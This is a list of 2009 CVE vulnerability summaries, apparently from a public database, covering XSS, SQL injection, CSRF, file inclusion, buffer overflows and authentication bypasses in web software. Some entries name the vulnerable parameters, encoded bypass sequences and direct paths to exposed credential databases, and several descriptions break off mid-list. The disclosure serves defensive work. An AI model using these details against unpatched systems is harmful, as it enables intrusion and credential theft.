[CVE-2009-1684] Cross-site scripting (XSS) vulnerability in WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 allows remote attackers to inject arbitrary web script or HTML via an event handler that triggers script execution in the context of the next loaded document.
[CVE-2009-1681] WebKit in Apple Safari before 4.0, iPhone OS 1.0 through 2.2.1, and iPhone OS for iPod touch 1.1 through 2.2.1 does not prevent web sites from loading third-party content into a subframe, which allows remote attackers to bypass the Same Origin Policy and conduct "clickjacking" attacks via a crafted HTML document.
[CVE-2009-1658] Multiple SQL injection vulnerabilities in admin/admin.php in Realty Webware Technologies Realty Web-Base 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) user (username) and (2) password parameters. NOTE: some of these details are obtained from third party information.
[CVE-2009-1654] Cross-site scripting (XSS) vulnerability in questiondetail.php in Easy Scripts Answer and Question Script allows remote attackers to inject arbitrary web script or HTML via the questionid parameter.
[CVE-2009-1635] Multiple cross-site scripting (XSS) vulnerabilities in the WebAccess component in Novell GroupWise 7.x before 7.03 HP3 and 8.x before 8.0 HP2 allow remote attackers to inject arbitrary web script or HTML via (1) the User.lang parameter to the login page (aka gw/webacc), (2) style expressions in a message that contains an HTML file, or (3) vectors associated with incorrect protection mechanisms against scripting, as demonstrated using whitespace between JavaScript event names and values.
[CVE-2009-1634] The WebAccess component in Novell GroupWise 7.x before 7.03 HP3 and 8.x before 8.0 HP2 does not properly implement session management mechanisms, which allows remote attackers to gain access to user accounts via unspecified vectors.
[CVE-2009-1623] Cross-site scripting (XSS) vulnerability in index.php in Dew-NewPHPLinks 2.0 allows remote attackers to inject arbitrary web script or HTML via the PID parameter.
[CVE-2009-1620] Multiple cross-site scripting (XSS) vulnerabilities in input.php in MataChat allow remote attackers to inject arbitrary web script or HTML via the (1) nickname and (2) color parameters.
[CVE-2009-1616] Cross-site scripting (XSS) vulnerability in docs/showdoc.php in Coppermine Photo Gallery (CPG) before 1.4.22 allows remote attackers to inject arbitrary web script or HTML via the css parameter, a different vector than CVE-2008-0505.
[CVE-2009-1614] Multiple cross-site scripting (XSS) vulnerabilities in Leap CMS 0.1.4 allow remote attackers to inject arbitrary web script or HTML via (1) the msg parameter (aka the message in an article comment) or (2) the searchterm parameter (aka the search post form). NOTE: some of these details are obtained from third party information.
[CVE-2009-1607] Cross-site scripting (XSS) vulnerability in the administrator panel in phpForm.net LinkBase 2.0 allows remote attackers to inject arbitrary web script or HTML via the username in a registration, which is not properly handled when the administrator accesses the Users menu.
[CVE-2009-1600] Apple Safari executes DOM calls in response to a javascript: URI in the target attribute of a submit element within a form contained in an inline PDF file, which might allow remote attackers to bypass intended Adobe Acrobat JavaScript restrictions on accessing the document object, as demonstrated by a web site that permits PDF uploads by untrusted users, and therefore has a shared document.domain between the web site and this javascript: URI. NOTE: the researcher reports that Adobe's position is "a PDF file is active content."
[CVE-2009-1599] Opera executes DOM calls in response to a javascript: URI in the target attribute of a submit element within a form contained in an inline PDF file, which might allow remote attackers to bypass intended Adobe Acrobat JavaScript restrictions on accessing the document object, as demonstrated by a web site that permits PDF uploads by untrusted users, and therefore has a shared document.domain between the web site and this javascript: URI. NOTE: the researcher reports that Adobe's position is "a PDF file is active content."
[CVE-2009-1598] Google Chrome executes DOM calls in response to a javascript: URI in the target attribute of a submit element within a form contained in an inline PDF file, which might allow remote attackers to bypass intended Adobe Acrobat JavaScript restrictions on accessing the document object, as demonstrated by a web site that permits PDF uploads by untrusted users, and therefore has a shared document.domain between the web site and this javascript: URI. NOTE: the researcher reports that Adobe's position is "a PDF file is active content."
[CVE-2009-1597] Mozilla Firefox executes DOM calls in response to a javascript: URI in the target attribute of a submit element within a form contained in an inline PDF file, which might allow remote attackers to bypass intended Adobe Acrobat JavaScript restrictions on accessing the document object, as demonstrated by a web site that permits PDF uploads by untrusted users, and therefore has a shared document.domain between the web site and this javascript: URI. NOTE: the researcher reports that Adobe's position is "a PDF file is active content."
[CVE-2009-1594] Armorlogic Profense Web Application Firewall before 2.2.22, and 2.4.x before 2.4.4, does not properly implement the "positive model," which allows remote attackers to bypass certain protection mechanisms via a %0A (encoded newline), as demonstrated by a %0A in a cross-site scripting (XSS) attack URL.
[CVE-2009-1593] Armorlogic Profense Web Application Firewall before 2.2.22, and 2.4.x before 2.4.4, does not properly implement the "negative model," which allows remote attackers to conduct cross-site scripting (XSS) attacks via a modified end tag of a SCRIPT element.
[CVE-2009-1591] CRLF injection vulnerability in CGI RESCUE Web Mailer before 1.04 allows remote attackers to inject arbitrary HTTP headers, and conduct cross-site scripting (XSS) or HTTP response splitting attacks, via CRLF sequences in an unspecified web form.
[CVE-2009-1590] Unspecified vulnerability in CGI RESCUE FORM2MAIL before 1.42 allows remote attackers to send email to arbitrary recipients via a web form.
[CVE-2009-1588] Cross-site scripting (XSS) vulnerability in CGI RESCUE MiniBBS 8t before 8.95t, 8 before 8.95, 9 before 9.08, and 10 before 10.32 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-1583] Multiple cross-site scripting (XSS) vulnerabilities in TemaTres 1.0.3 and 1.031 allow remote attackers to inject arbitrary web script or HTML via the (1) search form
[CVE-2009-1581] functions/mime.php in SquirrelMail before 1.4.18 does not protect the application's content from Cascading Style Sheets (CSS) positioning in HTML e-mail messages, which allows remote attackers to spoof the user interface, and conduct cross-site scripting (XSS) and phishing attacks, via a crafted message.
[CVE-2009-1580] Session fixation vulnerability in SquirrelMail before 1.4.18 allows remote attackers to hijack web sessions via a crafted cookie.
[CVE-2009-1578] Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail before 1.4.18 and NaSMail before 1.7 allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) certain encrypted strings in e-mail headers, related to contrib/decrypt_headers.php
[CVE-2009-1575] Cross-site scripting (XSS) vulnerability in Drupal 5.x before 5.17 and 6.x before 6.11, as used in vbDrupal before 5.17.0, allows remote attackers to inject arbitrary web script or HTML via crafted UTF-8 byte sequences before the Content-Type meta tag, which are treated as UTF-7 by Internet Explorer 6 and 7.
[CVE-2009-1557] Multiple cross-site scripting (XSS) vulnerabilities on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allow remote attackers to inject arbitrary web script or HTML via the next_file parameter to (1) main.cgi, (2) img/main.cgi, or (3) adm/file.cgi
[CVE-2009-1554] Cross-site scripting (XSS) vulnerability in ThemeServlet.java in Sun Woodstock 4.2, as used in Sun GlassFish Enterprise Server and other products, allows remote attackers to inject arbitrary web script or HTML via a UTF-7 string in the PATH_INFO, which is displayed on the 404 error page, as demonstrated by the PATH_INFO to theme/META-INF.
[CVE-2009-1553] Multiple cross-site scripting (XSS) vulnerabilities in the Admin Console in Sun GlassFish Enterprise Server 2.1 allow remote attackers to inject arbitrary web script or HTML via the query string to (1) applications/applications.jsf, (2) configuration/configuration.jsf, (3) customMBeans/customMBeans.jsf, (4) resourceNode/resources.jsf, (5) sysnet/registration.jsf, or (6) webService/webServicesGeneral.jsf
[CVE-2009-1551] Multiple PHP remote file inclusion vulnerabilities in Qt quickteam 2 allow remote attackers to execute arbitrary PHP code via a URL in the (1) qte_web_path parameter to qte_web.php and the (2) qte_root parameter to bin/qte_init.php.
[CVE-2009-1535] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.1 and 6.0 allows remote attackers to bypass URI-based protection mechanisms, and list folders or read, create, or modify files, via a %c0%af (Unicode / character) at an arbitrary position in the URI, as demonstrated by inserting %c0%af into a "/protected/" initial pathname component to bypass the password protection on the protected\ folder, aka "IIS 5.1 and 6.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1122.
[CVE-2009-1534] Buffer overflow in the Office Web Components ActiveX Control in Microsoft Office XP SP3, Office 2000 Web Components SP3, Office XP Web Components SP3, BizTalk Server 2002, and Visual Studio .NET 2003 SP1 allows remote attackers to execute arbitrary code via crafted property values, aka "Office Web Components Buffer Overflow Vulnerability."
[CVE-2009-1524] Cross-site scripting (XSS) vulnerability in Mort Bay Jetty before 6.1.17 allows remote attackers to inject arbitrary web script or HTML via a directory listing request containing a
[CVE-2009-1520] Buffer overflow in the Web GUI in the IBM Tivoli Storage Manager (TSM) client 5.1.0.0 through 5.1.8.2, 5.2.0.0 through 5.2.5.3, 5.3.0.0 through 5.3.6.4, 5.4.0.0 through 5.4.2.6, and 5.5.0.0 through 5.5.1.17 allows attackers to cause a denial of service (application crash) or execute arbitrary code via unspecified vectors.
[CVE-2009-1516] Stack-based buffer overflow in the IceWarpServer.APIObject ActiveX control in api.dll in IceWarp Merak Mail Server 9.4.1 might allow context-dependent attackers to execute arbitrary code via a large value in the second argument to the Base64FileEncode method, as possibly demonstrated by a web application that accepts untrusted input for this method.
[CVE-2009-1501] Cross-site scripting (XSS) vulnerability in the Exif module 5.x-1.x before 5.x-1.2 and 6.x-1.x-dev before April 13, 2009, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via EXIF tags in an image.
[CVE-2009-1495] Web File Explorer 3.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for data/db.mdb.
[CVE-2009-1482] Multiple cross-site scripting (XSS) vulnerabilities in action/AttachFile.py in MoinMoin 1.8.2 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) an AttachFile sub-action in the error_msg function or (2) multiple vectors related to package file errors in the upload_form function, different vectors than CVE-2009-0260.
[CVE-2009-1469] CRLF injection vulnerability in the Forgot Password implementation in server/webmail.php in IceWarp eMail Server and WebMail Server before 9.4.2 makes it easier for remote attackers to trick a user into disclosing credentials via CRLF sequences preceding a Reply-To header in the subject element of an XML document, as demonstrated by triggering an e-mail message from the server that contains a user's correct credentials, and requests that the user compose a reply that includes this message.
[CVE-2009-1468] Multiple SQL injection vulnerabilities in the search form in server/webmail.php in the Groupware component in IceWarp eMail Server and WebMail Server before 9.4.2 allow remote authenticated users to execute arbitrary SQL commands via the (1) sql and (2) order_by elements in an XML search query.
[CVE-2009-1467] Multiple cross-site scripting (XSS) vulnerabilities in IceWarp eMail Server and WebMail Server before 9.4.2 allow remote attackers to inject arbitrary web script or HTML via (1) the body of a message, related to the email view and incorrect HTML filtering in the cleanHTML function in server/inc/tools.php
[CVE-2009-1461] Cross-site scripting (XSS) vulnerability in the Create New Page form in razorCMS 0.3 RC2 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the Page Title field.
[CVE-2009-1459] Cross-site request forgery (CSRF) vulnerability in razorCMS before 0.4 allows remote attackers to hijack the authentication of administrators for requests that create a web page containing PHP code.
[CVE-2009-1458] Multiple cross-site scripting (XSS) vulnerabilities in admin/index.php in razorCMS before 0.4 allow remote attackers to inject arbitrary web script or HTML via (1) the slab parameter in an edit action, (2) the catname parameter in a showcats action, and (3) the cat parameter in a reordercat action.
[CVE-2009-1457] Cross-site scripting (XSS) vulnerability in player.php in Nuke Evolution Xtreme 2.x allows remote attackers to inject arbitrary web script or HTML via the defaultVisualExt parameter. NOTE: the provenance of this information is unknown
[CVE-2009-1455] Multiple cross-site request forgery (CSRF) vulnerabilities in WebCollab before 2.50 (aka Billy Goat) allow remote attackers to hijack the authentication of administrators for requests that change an arbitrary password or have other unspecified impact.
[CVE-2009-1454] Cross-site scripting (XSS) vulnerability in tasks.php in WebCollab before 2.50 (aka Billy Goat) allows remote attackers to inject arbitrary web script or HTML via the selection parameter in a todo action.
[CVE-2009-1451] Cross-site scripting (XSS) vulnerability in startpage.php in SMA-DB 0.3.12 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2009-1448] Cross-site scripting (XSS) vulnerability in apricot.php in LovPop.net APRICOT, probably 1.20, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2009-1445] Multiple directory traversal vulnerabilities in WebPortal CMS 0.8-beta allow remote attackers to (1) read arbitrary files via directory traversal sequences in the lang parameter to libraries/helpdocs/help.php and (2) include and execute arbitrary local files via directory traversal sequences in the error parameter to index.php.
[CVE-2009-1444] PHP remote file inclusion vulnerability in indexk.php in WebPortal CMS 0.8-beta allows remote attackers to execute arbitrary PHP code via a URL in the lib_path parameter.
[CVE-2009-1436] The db interface in libc in FreeBSD 6.3, 6.4, 7.0, 7.1, and 7.2-PRERELEASE does not properly initialize memory for Berkeley DB 1.85 database structures, which allows local users to obtain sensitive information by reading a database file.
[CVE-2009-1428] Multiple cross-site scripting (XSS) vulnerabilities in ccLgView.exe in the Symantec Log Viewer, as used in Symantec AntiVirus (SAV) before 10.1 MR8, Symantec Endpoint Protection (SEP) 11.0 before 11.0 MR1, Norton 360 1.0, and Norton Internet Security 2005 through 2008, allow remote attackers to inject arbitrary web script or HTML via a crafted e-mail message, related to "two parsing errors."
[CVE-2009-1418] Cross-site scripting (XSS) vulnerability in HP System Management Homepage (SMH) before 3.0.1.73 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-1413] Google Chrome 1.0.x does not cancel timeouts upon a page transition, which makes it easier for attackers to conduct Universal XSS attacks by calling setTimeout to trigger future execution of JavaScript code, and then modifying document.location to arrange for JavaScript execution in the context of an arbitrary web site. NOTE: this can be leveraged for a remote attack by exploiting a chromehtml: argument-injection vulnerability.
[CVE-2009-1412] Argument injection vulnerability in the chromehtml: protocol handler in Google Chrome before 1.0.154.59, when invoked by Internet Explorer, allows remote attackers to determine the existence of files, and open tabs for URLs that do not satisfy the IsWebSafeScheme restriction, via a web page that sets document.location to a chromehtml: value, as demonstrated by use of a (1) javascript: or (2) data: URL. NOTE: this can be leveraged for Universal XSS by exploiting certain behavior involving persistence across page transitions.
[CVE-2009-1408] Cross-site scripting (XSS) vulnerability in webSPELL 4.2.0c allows remote attackers to inject arbitrary web script or HTML via Javascript events such as onmouseover in nested BBcode tags, as demonstrated using (1) email, (2) img, and (3) url tags.
[CVE-2009-1380] Cross-site scripting (XSS) vulnerability in JMX-Console in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP08 and 4.3 before 4.3.0.CP07 allows remote attackers to inject arbitrary web script or HTML via the filter parameter, related to the key property and the position of quote and colon characters.
[CVE-2009-1367] Cross-site scripting (XSS) vulnerability in index.php in moziloCMS 1.11 allows remote attackers to inject arbitrary web script or HTML via the query parameter in search action, a different issue than CVE-2008-6127.
[CVE-2009-1366] Cross-site scripting (XSS) vulnerability in Website\admin\Sales\paypalipn.aspx in DotNetNuke (DNN) before 4.9.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "name/value pairs" and "paypal IPN functionality."
[CVE-2009-1353] Buffer overflow in the http_parse_hex function in libz/misc.c in Zervit Webserver 0.02 allows remote attackers to cause a denial of service (daemon crash) via a long URI, related to http.c.
[CVE-2009-1349] Cross-site scripting (XSS) vulnerability in C2Net Stronghold 2.3 allows remote attackers to inject arbitrary web script or HTML via the URI.
[CVE-2009-1344] Cross-site scripting (XSS) vulnerability in the Localization client module 5.x before 5.x-1.2 and 6.x before 6.x-1.7, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via input to the translation functionality.
[CVE-2009-1343] Cross-site scripting (XSS) vulnerability in the Print (aka Printer, e-mail and PDF versions) module 5.x before 5.x-4.5 and 6.x before 6.x-1.5, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via content titles.
[CVE-2009-1342] Cross-site scripting (XSS) vulnerability in the CCK comment reference module 6.x before 6.x-1.2, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via certain comment titles associated with a node edit form.
[CVE-2009-1334] Cross-site scripting (XSS) vulnerability in login/FilepathLogin.html in IBM Tivoli Continuous Data Protection (CDP) for Files 3.1.4.0 allows remote attackers to inject arbitrary web script or HTML via the reason parameter.
[CVE-2009-1323] SQL injection vulnerability in body.asp in Web File Explorer 3.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.
[CVE-2009-1322] ASP Product Catalog 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user credentials via a direct request for database/aspProductCatalog.mdb.
[CVE-2009-1321] Cross-site scripting (XSS) vulnerability in search.asp in ASP Product Catalog 1.0 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter.
[CVE-2009-1320] Multiple cross-site scripting (XSS) vulnerabilities in include/zstore.php in Zazzle Store Builder 1.0.2 allow remote attackers to inject arbitrary web script or HTML via the (1) gridPage and (2) gridSort parameters. NOTE: some of these details are obtained from third party information.
[CVE-2009-1315] Multiple cross-site scripting (XSS) vulnerabilities in AbleSpace 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) gid parameter to groups_profile.php, (2) cat_id and (3) razd_id parameters to adv_cat.php, and the (4) URL to blogs_full.php.
[CVE-2009-1314] body.asp in Web File Explorer 3.1 allows remote attackers to create arbitrary files and execute arbitrary code via the savefile action with a file parameter containing a filename that has an executable extension.
[CVE-2009-1311] Mozilla Firefox before 3.0.9 and SeaMonkey before 1.1.17 allow user-assisted remote attackers to obtain sensitive information via a web page with an embedded frame, which causes POST data from an outer page to be sent to the inner frame's URL during a SAVEMODE_FILEONLY save of the inner frame.
[CVE-2009-1310] Cross-site scripting (XSS) vulnerability in the MozSearch plugin implementation in Mozilla Firefox before 3.0.9 allows user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SearchForm element.
[CVE-2009-1308] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey allows remote attackers to inject arbitrary web script or HTML via vectors involving XBL JavaScript bindings and remote stylesheets, as exploited in the wild by a March 2009 eBay listing.
[CVE-2009-1307] The view-source: URI implementation in Mozilla Firefox before 3.0.9, Thunderbird, and SeaMonkey does not properly implement the Same Origin Policy, which allows remote attackers to (1) bypass crossdomain.xml restrictions and connect to arbitrary web sites via a Flash file
[CVE-2009-1294] Multiple cross-site scripting (XSS) vulnerabilities in web/guest/home in the Liferay 4.3.0 portal in Novell Teaming 1.0 through SP3 (1.0.3) allow remote attackers to inject arbitrary web script or HTML via the (1) p_p_state or (2) p_p_mode parameters.
[CVE-2009-1293] The web login functionality (c/portal/login) in Novell Teaming 1.0 through SP3 (1.0.3) generates different error messages depending on whether the username is valid or invalid, which makes it easier for remote attackers to enumerate usernames.
[CVE-2009-1291] Stack-based buffer overflow in TIBCO SmartSockets before 6.8.2, SmartSockets Product Family (aka RTworks) before 4.0.5, and Enterprise Message Service (EMS) 4.0.0 through 5.1.1, as used in SmartSockets Server and RTworks Server (aka RTserver), SmartSockets client libraries and add-on products, RTworks libraries and components, EMS Server (aka tibemsd), SmartMQ, iProcess Engine, ActiveMatrix products, and CA Enterprise Communicator, allows remote attackers to execute arbitrary code via "inbound data," as demonstrated by requests to the UDP interface of the RTserver component, and data injection into the TCP stream to tibemsd.
[CVE-2009-1289] private/login.ssi in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allows remote attackers to discover the access roles and scopes of arbitrary user accounts via a modified WEBINDEX parameter.
[CVE-2009-1288] Multiple cross-site scripting (XSS) vulnerabilities in the Advanced Management Module (AMM) on the IBM BladeCenter, including the BladeCenter H with BPET36H 54, allow remote attackers to inject arbitrary web script or HTML via (1) the username in a login action or (2) the PATH parameter to private/file_management.ssi in the File manager.
[CVE-2009-1287] Cross-site scripting (XSS) vulnerability in Cisco Subscriber Edge Services Manager (SESM) allows remote attackers to inject arbitrary web script or HTML via the URI. NOTE: some of these details are obtained from third party information.
[CVE-2009-1281] Cross-site scripting (XSS) vulnerability in glFusion before 1.1.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-1279] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! 1.5 through 1.5.9 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors to the (1) com_admin component, (2) com_search component when "Gather Search Statistics" is enabled, and (3) the category view in the com_content component.
[CVE-2009-1261] Multiple cross-site scripting (XSS) vulnerabilities in Web Help Desk 9.1.22 (evaluation version) allow remote attackers to inject arbitrary web script or HTML via the (1) Report Name, (2) Asset No., and (3) Full Name fields in a Models action. NOTE: the provenance of this information is unknown
[CVE-2009-1249] Cross-site scripting (XSS) vulnerability in Feed element mapper 5.x before 5.x-1.1, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via the content title in admin/content/node-type/nodetype/map.
[CVE-2009-1238] Race condition in the HFS vfs sysctl interface in XNU 1228.8.20 and earlier on Apple Mac OS X 10.5.6 and earlier allows local users to cause a denial of service (kernel memory corruption) by simultaneously executing the same HFS_SET_PKG_EXTENSIONS code path in multiple threads, which is problematic because of lack of mutex locking for an unspecified global variable.
[CVE-2009-1228] Cross-site scripting (XSS) vulnerability in register.php in Arcadwy Arcade Script CMS allows remote attackers to inject arbitrary web script or HTML via the username field (user_name parameter).
[CVE-2009-1227] ** DISPUTED ** NOTE: this issue has been disputed by the vendor. Buffer overflow in the PKI Web Service in Check Point Firewall-1 PKI Web Service allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) Authorization or (2) Referer HTTP header to TCP port 18624. NOTE: the vendor has disputed this issue, stating "Check Point Security Alert Team has analyzed this report. We've tried to reproduce the attack on all VPN-1 versions from NG FP2 and above with and without HFAs. The issue was not reproduced. We have conducted a thorough analysis of the relevant code and verified that we are secure against this attack. We consider this attack to pose no risk to Check Point customers." In addition, the original researcher, whose reliability is unknown as of 20090407, also states that the issue "was discovered during a pen-test where the client would not allow further analysis."
[CVE-2009-1225] Cross-site scripting (XSS) vulnerability in index.php in Turnkey Ebook Store 1.1 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search action.
[CVE-2009-1223] aspWebCalendar Free Edition stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user credentials via a direct request for calendar/calendar.mdb.
[CVE-2009-1222] Directory traversal vulnerability in index.php in webEdition 6.0.0.4 and earlier, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary files via a .. (dot dot) in the WE_LANGUAGE parameter.
[CVE-2009-1220] Cross-site scripting (XSS) vulnerability in +webvpn+/index.html in WebVPN on the Cisco Adaptive Security Appliances (ASA) 5520 with software 7.2(4)30 and earlier 7.2 versions including 7.2(2)22, and 8.0(4)28 and earlier 8.0 versions, when clientless mode is enabled, allows remote attackers to inject arbitrary web script or HTML via the Host HTTP header.
[CVE-2009-1219] Sun Calendar Express Web Server in Sun ONE Calendar Server 6.0 and Sun Java System Calendar Server 6 2004Q2 through 6.3-7.01 allows remote attackers to cause a denial of service (daemon crash) via multiple requests to the default URI with alphabetic characters in the tzid parameter.
[CVE-2009-1218] Multiple cross-site scripting (XSS) vulnerabilities in Sun Calendar Express Web Server in Sun ONE Calendar Server 6.0 and Sun Java System Calendar Server 6 2004Q2 through 6.3-7.01 allow remote attackers to inject arbitrary web script or HTML via (1) the fmt-out parameter to login.wcap or (2) the date parameter to command.shtml.
[CVE-2009-1211] Blue Coat ProxySG, when transparent interception mode is enabled, uses the HTTP Host header to determine the remote endpoint, which allows remote attackers to bypass access controls for Flash, Java, Silverlight, and probably other technologies, and possibly communicate with restricted intranet sites, via a crafted web page that causes a client to send HTTP requests with a modified Host header.
[CVE-2009-1209] Stack-based buffer overflow in W3C Amaya Web Browser 11.1 allows remote attackers to execute arbitrary code via a script tag with a long defer attribute.
[CVE-2009-1204] Cross-site scripting (XSS) vulnerability in TikiWiki (Tiki) CMS/Groupware 2.2 allows remote attackers to inject arbitrary web script or HTML via the PHP_SELF portion of a URI to (1) tiki-galleries.php, (2) tiki-list_file_gallery.php, (3) tiki-listpages.php, and (4) tiki-orphan_pages.php.
[CVE-2009-1203] WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 does not properly distinguish its own login screen from the login screens it produces for third-party (1) FTP and (2) CIFS servers, which makes it easier for remote attackers to trick a user into sending WebVPN credentials to an arbitrary server via a URL associated with that server, aka Bug ID CSCsy80709.
[CVE-2009-1202] WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 allows remote attackers to bypass certain protection mechanisms involving URL rewriting and HTML rewriting, and conduct cross-site scripting (XSS) attacks, by modifying the first hex-encoded character in a /+CSCO+ URI, aka Bug ID CSCsy80705.
[CVE-2009-1201] Eval injection vulnerability in the csco_wrap_js function in /+CSCOL+/cte.js in WebVPN on the Cisco Adaptive Security Appliances (ASA) device with software 8.0(4), 8.1.2, and 8.2.1 allows remote attackers to bypass a DOM wrapper and conduct cross-site scripting (XSS) attacks by setting CSCO_WebVPN['process'] to the name of a crafted function, aka Bug ID CSCsy80694.
[CVE-2009-1175] Cross-site scripting (XSS) vulnerability in apps/web/vs_diag.cgi in the DAAP extension in Banshee 1.4.2 allows remote attackers to inject arbitrary web script or HTML via the server parameter, which is not properly handled in an error message.
[CVE-2009-1174] The Web Services Security component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.35 and 7.0 before 7.0.0.3 has an unspecified "security problem" in the XML digital-signature specification, which has unknown impact and attack vectors.
[CVE-2009-1173] IBM WebSphere Application Server (WAS) 7.0 before 7.0.0.3 uses weak permissions (777) for files associated with unspecified "interim fixes," which allows attackers to modify files that would not have been accessible if the intended 755 permissions were used.
[CVE-2009-1172] The JAX-RPC WS-Security runtime in the Web Services Security component in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.23 and 7.0 before 7.0.0.3, when APAR PK41002 is installed, does not properly validate UsernameToken objects, which has unknown impact and attack vectors.
[CVE-2009-1162] Cross-site scripting (XSS) vulnerability in the Spam Quarantine login page in Cisco IronPort AsyncOS before 6.5.2 on Series C, M, and X appliances allows remote attackers to inject arbitrary web script or HTML via the referrer parameter.
[CVE-2009-1150] Multiple cross-site scripting (XSS) vulnerabilities in the export page (display_export.lib.php) in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allow remote attackers to inject arbitrary web script or HTML via the pma_db_filename_template cookie.
[CVE-2009-1147] Unspecified vulnerability in vmci.sys in the Virtual Machine Communication Interface (VMCI) in VMware Workstation 6.5.1 and earlier, VMware Player 2.5.1 and earlier, VMware ACE 2.5.1 and earlier, and VMware Server 2.0.x before 2.0.1 build 156745 allows local users to gain privileges via unknown vectors.
[CVE-2009-1136] The Microsoft Office Web Components Spreadsheet ActiveX control (aka OWC10 or OWC11), as distributed in Office XP SP3 and Office 2003 SP3, Office XP Web Components SP3, Office 2003 Web Components SP3, Office 2003 Web Components SP1 for the 2007 Microsoft Office System, Internet Security and Acceleration (ISA) Server 2004 SP3 and 2006 Gold and SP1, and Office Small Business Accounting 2006, when used in Internet Explorer, allows remote attackers to execute arbitrary code via a crafted call to the msDataSourceObject method, as exploited in the wild in July and August 2009, aka "Office Web Components HTML Script Vulnerability."
[CVE-2009-1135] Microsoft Internet Security and Acceleration (ISA) Server 2006 Gold and SP1, when Radius OTP is enabled, uses the HTTP-Basic authentication method, which allows remote attackers to gain the privileges of an arbitrary account, and access published web pages, via vectors involving attempted access to a network resource behind the ISA Server, aka "Radius OTP Bypass Vulnerability."
[CVE-2009-1122] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.0 on Windows 2000 SP4 does not properly decode URLs, which allows remote attackers to bypass authentication, and possibly read or create files, via a crafted HTTP request, aka "IIS 5.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1535.
[CVE-2009-1091] Cross-site scripting (XSS) vulnerability in upload.php in Rapidleech rev.36 and earlier allows remote attackers to inject arbitrary web script or HTML via the uploaded parameter.
[CVE-2009-1085] Piwik 0.2.32 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the API key and other sensitive information via a direct request for misc/cron/archive.sh.
[CVE-2009-1081] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Identity Manager (IdM) 7.0 through 8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs 19595 and 19661.
[CVE-2009-1080] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Identity Manager (IdM) 7.0 through 8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID 19033.
[CVE-2009-1079] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Identity Manager (IdM) 7.0 through 8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs 19659, 19660, and 19683.
[CVE-2009-1077] The Change My Password implementation in the admin interface in Sun Java System Identity Manager (IdM) 7.0 through 8.0 does not enforce the RequiresChallenge property setting, which allows remote authenticated users to change the passwords of other users, as demonstrated by changing the administrator's password.
[CVE-2009-1070] Cross-site scripting (XSS) vulnerability in system/index.php in ExpressionEngine 1.6.4 through 1.6.6, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the avatar parameter.
[CVE-2009-1069] Multiple cross-site scripting (XSS) vulnerabilities in the node edit form feature in Drupal Content Construction Kit (CCK) 6.x before 6.x-2.2, a module for Drupal, allow remote attackers to inject arbitrary web script or HTML via the (1) titles of candidate referenced nodes in the Node reference sub-module and the (2) names of candidate referenced users in the User reference sub-module.
[CVE-2009-1067] Cross-site scripting (XSS) vulnerability in index.php in Pixie CMS 1.01a allows remote attackers to inject arbitrary web script or HTML via the x parameter.
[CVE-2009-1055] Unspecified vulnerability in the web service in Sitecore CMS 5.3.1 rev. 071114 allows remote authenticated users to gain access to security databases, and obtain administrative and user credentials, via unknown vectors related to SOAP and XML requests.
[CVE-2009-1053] chaozzDB 1.2 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user credentials via a direct request for user.tsv.
[CVE-2009-1052] FireAnt 1.3 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing user credentials via a direct request for user.tsv.
